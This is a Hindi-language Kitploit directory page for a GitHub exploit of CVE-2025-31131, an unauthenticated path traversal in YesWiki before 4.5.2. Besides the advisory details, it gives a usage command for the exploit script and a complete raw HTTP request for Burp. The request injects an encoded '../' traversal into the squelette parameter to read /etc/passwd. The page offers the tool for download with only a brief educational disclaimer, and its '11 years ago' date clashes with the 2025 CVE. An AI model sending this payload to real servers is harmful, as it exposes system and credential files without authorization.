Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-31131 — यसविकी PHP में लिखी गई एक विकी प्रणाली है। squelette पैरामीटर पाथ ट्रैवर्सल हमलों के प्रति संवेदनशील है, जो सर्वर पर मनमानी फ़ाइलों तक पढ़ने की पहुंच सक्षम बनाता है। | Kitploit
उपकरण/GitHubGitHub/muhammadwaseem29/cve-2025-31131
भेद्यता विश्लेषणशोषणजानकारी एकत्र करनावेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubmuhammadwaseem29/cve-2025-31131

CVE-2025-31131

यसविकी PHP में लिखी गई एक विकी प्रणाली है। squelette पैरामीटर पाथ ट्रैवर्सल हमलों के प्रति संवेदनशील है, जो सर्वर पर मनमानी फ़ाइलों तक पढ़ने की पहुंच सक्षम बनाता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखेंवेबसाइट
11 साल पहलेअभी तक समीक्षित नहीं

CVE-2025-31131 - YesWiki < 4.5.2 पाथ ट्रैवर्सल एक्सप्लॉइट

यह YesWiki के 4.5.2 से पहले के संस्करणों को लक्षित करने वाला एक बिना प्रमाणीकरण वाला पाथ ट्रैवर्सल एक्सप्लॉइट है। यह भेद्यता squelette पैरामीटर में मौजूद है, जो सर्वर से मनमानी फाइलों को पढ़ने की अनुमति देती है।

भेद्यता विवरण

  • CVE-ID: CVE-2025-31131
  • प्रभावित सॉफ्टवेयर: YesWiki < 4.5.2
  • प्रकार: पाथ ट्रैवर्सल
  • गंभीरता: उच्च (CVSS: 8.6)
  • संदर्भ: https://github.com/advisories/GHSA-w34w-fvp3-68xm

उपयोग

python3 exploit.py -l urls.txt image

यहाँ Burp का उपयोग करके मैन्युअल रूप से एक्सप्लॉइट करने का दूसरा तरीका है:

root@kitploit:~
GET /?UrkCEO/edit&theme=margot&squelette=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&style=margot.css HTTP/1.1
Host: target.com
Sec-Ch-Ua: "Chromium";v="133", "Not(A:Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive

image

अस्वीकरण: यह केवल शैक्षिक उद्देश्यों के लिए है।


टूल डाउनलोड करें